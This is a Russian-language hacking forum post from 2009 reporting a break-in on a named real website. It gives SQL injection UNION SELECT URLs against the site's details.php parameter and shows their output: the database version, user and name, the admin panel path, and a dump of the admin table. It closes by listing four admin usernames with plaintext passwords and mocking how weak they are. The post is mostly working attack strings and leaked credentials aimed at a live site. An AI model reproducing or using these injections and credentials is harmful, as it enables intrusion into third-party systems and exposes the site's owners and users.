21.02.2009, 14:33
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
omnibc.ca - PR5
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6/*
DB_Ver: 5.0.45
DB_User: omnibc@localhost
DB: omnibc_08_2008
админка:
Код:
http://www.omnibc.ca/admin/
Теперь выясним пароль и логин доступа к админке... Впрочем это не трудно... Таблица с админами называется user а поля id,username,password,role... нам интересны второе и третье, то есть username и password
Код:
http://www.omnibc.ca/programming/details.php?id=999999%27+UNION+SELECT+concat_ws(0x3a,username,password),2,3,4,5,6+FROM+user+LIMIT+0,1/*
Всего 4 пользователя с просто потрясными паролями =) сначала думал что шутка =)
james:jamespass
user:userpass
news:newspass
community:communitypass
|
|
|